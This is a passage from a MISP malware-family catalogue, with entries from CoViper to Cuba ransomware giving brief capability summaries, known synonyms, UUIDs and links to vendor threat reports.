PCRisk notes that CoViper is yet another Coronavirus/COVID-19-themed malware infection, most likely proliferated as a file related to the pandemic. It operates by rewriting the system Master Boot Record (MBR). It does not delete the original, but rather creates a backup and replaces it with a custom MBR.
Typically, malicious software that modifies the MBR does so to prevent the Operating System (OS) from being booted (i.e., started). It also displays a full-screen message, often containing a ransom demand, which blocks user access to the device.
Internal MISP references
UUID 4d7d8496-52a6-47dc-abfe-4997af6dc465
which can be used as unique global reference for CoViper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
COZYDUKE
CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around a core backdoor component. This component can be instructed by the C&C server to download and execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array of functionality. Known CozyDuke modules include:
- Command execution module for executing arbitrary Windows Command Prompt commands
- Password stealer module
- NT LAN Manager (NTLM) hash stealer module
- System information gathering module
- Screenshot module
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular COZYDUKE.
Known Synonyms |
---|
Cozer |
CozyBear |
CozyCar |
EuroAPT |
Internal MISP references
UUID b461afd0-f5fd-4c25-8367-4235a6e8b9b1
which can be used as unique global reference for COZYDUKE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CrackedCantil
According to ANY.RUN, this is a dropper for win.privateloader, and its execution leads to a cascade of downloads of a large variety of additional malware. The families include more loaders, information stealers, cryptominers, a proxy bot, and ultimately also ransomware. The execution order is orchestrated, e.g. data is stolen and exfiltrated before encryption. It is distributed through advertised cracked software, e.g. IDA Pro.
Internal MISP references
UUID 000693a0-b4a6-4d8d-8276-d12403c71196
which can be used as unique global reference for CrackedCantil
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.crackedcantil - webarchive
- https://g0njxa.medium.com/privateloader-installskey-rewind-2023-c1ce027cbe65 - webarchive
- https://thehackernews.com/2024/02/beware-fake-facebook-job-ads-spreading.html?m=1 - webarchive
- https://any.run/cybersecurity-blog/crackedcantil-breakdown/ - webarchive
- https://www.cloudsek.com/blog/from-discussion-forums-to-malware-mayhem-the-alarming-rise-of-abuse-on-google-groups-and-usenet - webarchive
- https://otx.alienvault.com/pulse/65ba54eeaea0fcd931ff3b3b/ - webarchive
- https://www.infostealers.com/article/crackedcantil-a-malware-symphony-breakdown/ - webarchive
- https://www.pcrisk.com/removal-guides/28989-crackedcantil-malware - webarchive
- https://gridinsoft.com/blogs/crackedcantil-dropper-malware/ - webarchive
- https://xfe-integration.xforce.ibm.com/osint/guid:f8f1276c350a70b7b543990e4fb53a76 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
crackshot
CRACKSHOT is a downloader that can download files, including binaries, and run them from the hard disk or execute them directly in memory. It is also capable of placing itself into a dormant state.
Internal MISP references
UUID cfa111c1-3740-4832-8e89-12a536f4fff9
which can be used as unique global reference for crackshot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CradleCore
Internal MISP references
UUID 6fb5bfff-4b10-43a4-ad3c-a1578f39e83e
which can be used as unique global reference for CradleCore
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CRAT
According to Cisco Talos, CRAT is a remote access trojan with plugin capabilities, used by Lazarus since at least May 2020.
Internal MISP references
UUID ca901b56-b733-44af-aee2-38da79188dcb
which can be used as unique global reference for CRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.crat - webarchive
- https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg - webarchive
- https://www.secrss.com/articles/18635 - webarchive
- https://blog.talosintelligence.com/2020/11/crat-and-plugins.html - webarchive
- https://suspected.tistory.com/269 - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CREAMSICLE
Internal MISP references
UUID 9d193a65-dc18-4832-9daa-aab245cd1c86
which can be used as unique global reference for CREAMSICLE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CredoMap
Internal MISP references
UUID 37e6844c-4e45-4297-ac6e-afc98d37d994
which can be used as unique global reference for CredoMap
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.credomap - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf - webarchive
- https://cert.gov.ua/article/341128 - webarchive
- https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html - webarchive
- https://securityscorecard.com/research/apt28s-stealer-called-credomap - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Credraptor
Internal MISP references
UUID ac75d0a3-bb99-4453-9567-a6c8ba87a706
which can be used as unique global reference for Credraptor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CreepySnail
Internal MISP references
UUID a95d4aaa-302e-4a3c-a071-ba8eed978920
which can be used as unique global reference for CreepySnail
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CreepExfil
Internal MISP references
UUID fc743725-2fa6-48dd-8797-57e298375505
which can be used as unique global reference for CreepExfil
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Crenufs
Internal MISP references
UUID e8682902-7748-423a-8ba9-6f00d9fe7331
which can be used as unique global reference for Crenufs
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Crimson RAT
Crimson RAT was first discovered in 2017 and has since been used to attack organizations around the world. The malware is often distributed through phishing emails or by exploiting vulnerabilities in outdated security software. Once Crimson RAT is installed on a computer, it can be used to steal data, spy on users, and even take control of the infected computer.
Some of the features of Crimson RAT include:
- Remote control of infected computers
- Data theft, such as passwords, files, and emails
- User spying
- Takeover of infected computers
- Locking of infected computers
- Extortion of payments
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Crimson RAT.
Known Synonyms |
---|
SEEDOOR |
Scarimson |
Internal MISP references
UUID a61fc694-a88a-484d-a648-db35b49932fd
which can be used as unique global reference for Crimson RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson - webarchive
- https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols - webarchive
- https://blog.yoroi.company/research/transparent-tribe-four-years-later - webarchive
- https://brandefense.io/blog/apt-36-campaign-poseidon-malware-technical-analysis/ - webarchive
- https://s.tencent.com/research/report/669.html - webarchive
- https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware - webarchive
- https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack - webarchive
- https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html?m=1 - webarchive
- https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html - webarchive
- https://www.4hou.com/posts/vLzM - webarchive
- https://www.seqrite.com/blog/pakistani-apts-escalate-attacks-on-indian-gov-seqrite-labs-unveils-threats-and-connections/ - webarchive
- https://www.secureworks.com/research/threat-profiles/copper-fieldstone - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf - webarchive
- https://twitter.com/katechondic/status/1502206599166939137 - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf - webarchive
- https://securelist.com/transparent-tribe-part-2/98233/ - webarchive
- https://team-cymru.com/blog/2021/07/02/transparent-tribe-apt-infrastructure-mapping-2/ - webarchive
- https://twitter.com/teamcymru/status/1351228309632385027 - webarchive
- https://mp.weixin.qq.com/s/ELYDvdMiiy4FZ3KpmAddZQ - webarchive
- https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF - webarchive
- https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/ - webarchive
- https://anchorednarratives.substack.com/p/trouble-in-asia-and-the-middle-east - webarchive
- https://www.secrss.com/articles/24995 - webarchive
- https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/ - webarchive
- https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/ - webarchive
- https://www.seqrite.com/blog/transparent-tribe-apt-actively-lures-indian-army-amidst-increased-targeting-of-educational-institutions - webarchive
- https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html - webarchive
- https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html - webarchive
- https://labs.k7computing.com/index.php/threat-actors-target-recent-election-results/ - webarchive
- https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg - webarchive
- https://securelist.com/transparent-tribe-part-1/98127/ - webarchive
- https://team-cymru.com/blog/2021/04/16/transparent-tribe-apt-infrastructure-mapping/ - webarchive
- https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf - webarchive
- https://twitter.com/teamcymru_S2/status/1501955802025836546 - webarchive
- https://labs.k7computing.com/index.php/transparent-tribe-targets-educational-institution/ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CrimsonIAS
According to ThreatConnect, CrimsonIAS is a Delphi-written backdoor dating back to at least 2017. It enables operators to run command line tools, exfiltrate files, and upload files to the infected machine. CrimsonIAS is notable in that it only listens for incoming connections, which sets it apart from typical Windows backdoors that beacon out.
Internal MISP references
UUID 6f2a68d1-06a9-4657-98d8-590a6446e475
which can be used as unique global reference for CrimsonIAS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cring
Ransomware.
Internal MISP references
UUID f5a19987-d0b6-4cc3-89ab-d4540f2e9744
which can be used as unique global reference for Cring
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cring - webarchive
- https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html - webarchive
- https://twitter.com/swisscom_csirt/status/1354052879158571008 - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728 - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Vulnerability-in-Fortigate-VPN-servers-is-exploited-in-Cring-ransomware-attacks-En.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CrossLock
Internal MISP references
UUID 505dc6be-56f3-49ca-be11-45b3e78a4ac2
which can be used as unique global reference for CrossLock
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CROSSWALK
According to FireEye, CROSSWALK is a skeletal, modular backdoor capable of system survey and adding modules in response to C&C replies.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CROSSWALK.
Known Synonyms |
---|
Motnug |
ProxIP |
TOMMYGUN |
Internal MISP references
UUID 7ca7c08b-36fd-46b3-8b9e-a8b0d4743433
which can be used as unique global reference for CROSSWALK
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk - webarchive
- https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware - webarchive
- https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
- https://thehackernews.com/2021/01/researchers-disclose-undocumented.html - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/earth-baku-returns - webarchive
- https://content.fireeye.com/apt-41/rpt-apt41/ - webarchive
- https://www.youtube.com/watch?v=FttiysUZmDw - webarchive
- https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/ - webarchive
- https://twitter.com/MrDanPerez/status/1159459082534825986 - webarchive
- https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://www.youtube.com/watch?v=8x-pGlWpIYI - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Croxloader
According to Trend Micro, this is a custom loader for win.cobalt_strike, used by Earth Longzhi (a subgroup of APT41).
Internal MISP references
UUID 48d697ec-aa34-4d98-83e4-17b736d59a85
which can be used as unique global reference for Croxloader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CruLoader
Internal MISP references
UUID 22d90775-cdcc-4c80-bb0a-1503275671c7
which can be used as unique global reference for CruLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Crutch
Internal MISP references
UUID e7dc138f-00cb-4db6-a6e7-3ecac853285d
which can be used as unique global reference for Crutch
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cryakl
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cryakl.
Known Synonyms |
---|
CryLock |
Internal MISP references
UUID 32fa6c53-b4fc-47f8-894c-1ea74180e02f
which can be used as unique global reference for Cryakl
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl - webarchive
- https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/ - webarchive
- https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx - webarchive
- https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/ - webarchive
- https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/ - webarchive
- https://bartblaze.blogspot.com/2016/02/vipasana-ransomware-new-ransom-on-block.html - webarchive
- https://twitter.com/albertzsigovits/status/1217866089964679174 - webarchive
- https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/ - webarchive
- https://twitter.com/demonslay335/status/971164798376468481 - webarchive
- https://securelist.com/cis-ransomware/104452/ - webarchive
- https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - webarchive
- https://unit42.paloaltonetworks.com/trigona-ransomware-update/ - webarchive
- https://twitter.com/bartblaze/status/1305197264332369920 - webarchive
- https://hackmag.com/security/ransomware-russian-style/ - webarchive
- https://www.telekom.com/en/blog/group/article/lockdata-auction-631300 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryLocker
Internal MISP references
UUID 980ea9fa-d29d-4a44-bb87-0c050f8ddeaf
which can be used as unique global reference for CryLocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CrypMic
Internal MISP references
UUID 2fe1dd8c-23d8-40a6-b042-bd2c4012fea6
which can be used as unique global reference for CrypMic
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/ - webarchive
- https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Crypt0l0cker
Internal MISP references
UUID 38b38f8c-944d-4062-bf35-561e8a81c8d2
which can be used as unique global reference for Crypt0l0cker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptBot
A typical infostealer, capable of stealing browser credentials, cryptocurrency wallets, browser cookies and credit card data, and of taking screenshots of the infected system. All stolen data is bundled into a zip file that is uploaded to the C2.
Internal MISP references
UUID 2274aaf6-4807-4cda-8f5b-16a757f4ff23
which can be used as unique global reference for CryptBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot - webarchive
- https://asec.ahnlab.com/en/24423/ - webarchive
- https://research.openanalysis.net/cryptbot/botnet/yara/config/2023/03/16/cryptbot.html - webarchive
- https://blog.google/technology/safety-security/continuing-our-work-to-hold-cybercriminal-ecosystems-accountable/ - webarchive
- https://asec.ahnlab.com/en/35981/ - webarchive
- https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ - webarchive
- https://experience.mandiant.com/trending-evil-2/p/1 - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://www.bleepingcomputer.com/news/security/revamped-cryptbot-malware-spread-by-pirated-software-sites/ - webarchive
- https://www.gdatasoftware.com/blog/2020/02/35802-bitbucket-abused-as-malware-slinger - webarchive
- https://www.bleepingcomputer.com/news/security/malicious-kmspico-installers-steal-your-cryptocurrency-wallets/ - webarchive
- https://www.mandiant.com/resources/russian-targeting-gov-business - webarchive
- https://redcanary.com/wp-content/uploads/2021/12/KMSPico-V5.pdf - webarchive
- https://fr3d.hk/blog/cryptbot-too-good-to-be-true - webarchive
- https://asec.ahnlab.com/en/31683/ - webarchive
- https://regmedia.co.uk/2023/04/28/handout_google_cryptbot_complaint.pdf - webarchive
- https://blogs.blackberry.com/en/2022/03/threat-thursday-cryptbot-infostealer - webarchive
- https://asec.ahnlab.com/en/26052/ - webarchive
- https://asec.ahnlab.com/en/31802/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CrypticConvo
CrypticConvo is a dropper trojan which appears to be embedded in an automatic generator framework to deliver the FakeM trojan. According to Palo Alto Networks, CrypticConvo and several additional trojans are believed to be part of a meta framework used by the "Scarlet Mimic" threat actor in order to quickly evade AV systems.
Internal MISP references
UUID 972fbb7b-6945-42d8-ba88-a7b4e6fc1ad4
which can be used as unique global reference for CrypticConvo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptNET
According to OALabs, this ransomware has the following features:
- Files are encrypted with AES CBC using a generated 256 bit key and IV.
- The generated AES keys are encrypted using a hard coded RSA key and appended to the encrypted files.
Internal MISP references
UUID 99c468a2-c69f-4c9c-9941-0627052001b2
which can be used as unique global reference for CryptNET
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptoClippy
Internal MISP references
UUID 7c296221-3945-4803-b25f-1e221b513f0d
which can be used as unique global reference for CryptoClippy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptoDarkRubix
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CryptoDarkRubix.
Known Synonyms |
---|
Ranet |
Internal MISP references
UUID c6d09bb2-5673-4b2b-b2cb-5d14f2568189
which can be used as unique global reference for CryptoDarkRubix
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptoJoker
CryptoJoker is an open source ransomware written in C#. CryptoJoker uses a combination of a "custom XOR" encryption and RSA. A public/private key pair is generated for every computer.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CryptoJoker.
Known Synonyms |
---|
PlutoCrypt |
Internal MISP references
UUID 01cb8122-7a24-436f-85d3-d6a306800f10
which can be used as unique global reference for CryptoJoker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptoLocker
CryptoLocker is a new, sophisticated malware that was launched in late 2013. It is designed to attack the Windows operating system by encrypting all the files on the system using an RSA-2048 public key. To decrypt the affected files, the user has to pay a ransom (usually 300 USD/EUR) or 2 Bitcoins.
Internal MISP references
UUID c5a783da-9ff3-4427-84c5-428480b21cc7
which can be used as unique global reference for CryptoLocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-evergreen - webarchive
- https://www.secureworks.com/research/cryptolocker-ransomware - webarchive
- https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://sites.temple.edu/care/ci-rw-attacks/ - webarchive
- https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf - webarchive
- https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-evergreen - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptoLuck
Internal MISP references
UUID 3ec67717-acd5-401b-8e9f-47e79edd07a0
which can be used as unique global reference for CryptoLuck
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptoMix
A variant of CryptoMix is win.clop.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CryptoMix.
Known Synonyms |
---|
Azer |
CryptFile2 |
Internal MISP references
UUID 55d5742e-20f5-4c9a-887a-4dbd5b37d921
which can be used as unique global reference for CryptoMix
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix - webarchive
- https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/ - webarchive
- https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/ - webarchive
- https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-azer-cryptomix-ransomware-variant-released/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptoPatronum
CryptoPatronum is a ransomware that encrypts user data with AES-256 (CBC) and asks for BTC / ETH in order to get the original files back. The ransom note has no title, only a reference to crsss.exe, its original file name. Once the files are encrypted, CryptoPatronum adds a .enc extension.
Internal MISP references
UUID 738acbd6-d0b7-40fd-bc1b-d7fbb74cbbf9
which can be used as unique global reference for CryptoPatronum
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cryptorium
Internal MISP references
UUID b7240444-94a6-4d57-a6b3-ca38182eff7a
which can be used as unique global reference for Cryptorium
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptoShield
Internal MISP references
UUID 6855c491-1b18-4414-9e78-8bc17f0b5b98
which can be used as unique global reference for CryptoShield
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield - webarchive
- https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/ - webarchive
- http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptoShuffler
Internal MISP references
UUID 87048a24-7339-4d4e-a141-661cd32a6f1d
which can be used as unique global reference for CryptoShuffler
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CRYPTOSLAY
Internal MISP references
UUID 4c49912a-fe14-40e7-90eb-3ffb0b3453f2
which can be used as unique global reference for CRYPTOSLAY
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cryptowall
CryptoWall is a ransomware that is usually spread by spam and phishing emails, malicious ads, hacked websites, or other malware, and uses a Trojan horse to deliver the malicious payload.
Internal MISP references
UUID 1cb63b32-cc65-4cdc-945a-e06a88cdd94b
which can be used as unique global reference for Cryptowall
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall - webarchive
- https://sites.temple.edu/care/ci-rw-attacks/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptoWire
Internal MISP references
UUID bc0c1e48-102c-4e6b-9b86-c442c4798159
which can be used as unique global reference for CryptoWire
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptoFortress
Internal MISP references
UUID ae4aa1ef-4da0-4952-9583-9d47f84edad9
which can be used as unique global reference for CryptoFortress
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptoRansomeware
Internal MISP references
UUID 2f65f056-6cba-4a5b-9aaf-daf31eb76fc2
which can be used as unique global reference for CryptoRansomeware
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CryptXXXX
Internal MISP references
UUID fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8
which can be used as unique global reference for CryptXXXX
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Crytox
Ransomware.
Internal MISP references
UUID c7fb0acb-018b-47eb-8555-5a0291e2505e
which can be used as unique global reference for Crytox
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CsExt
Internal MISP references
UUID c6a46f63-3ff1-4952-8350-fad9816b45c9
which can be used as unique global reference for CsExt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
csharp-streamer RAT
Internal MISP references
UUID 54d757df-8da2-4f6e-8789-8790d6a73e46
which can be used as unique global reference for csharp-streamer RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.csharpstreamer - webarchive
- https://blog.talosintelligence.com/warmcookie-analysis/ - webarchive
- https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/ - webarchive
- https://research.hisolutions.com/2024/06/how-to-detect-the-modular-rat-csharp-streamer/ - webarchive
- https://cyber.wtf/2023/12/06/the-csharp-streamer-rat/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CTB Locker
Internal MISP references
UUID e8e28718-fe55-4d31-8b84-f8ff0acf0614
which can be used as unique global reference for CTB Locker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ctb_locker - webarchive
- https://samvartaka.github.io/malware/2015/11/20/ctb-locker - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cuba
Ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cuba.
Known Synonyms |
---|
COLDDRAW |
Internal MISP references
UUID 6d9dfc5f-4ebf-404b-ab5e-e6497867fe65
which can be used as unique global reference for Cuba
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-threat-report-a-quick-primer-on-cuba-ransomware - webarchive
- https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html - webarchive
- https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-cuba-ransomware/ - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/ - webarchive
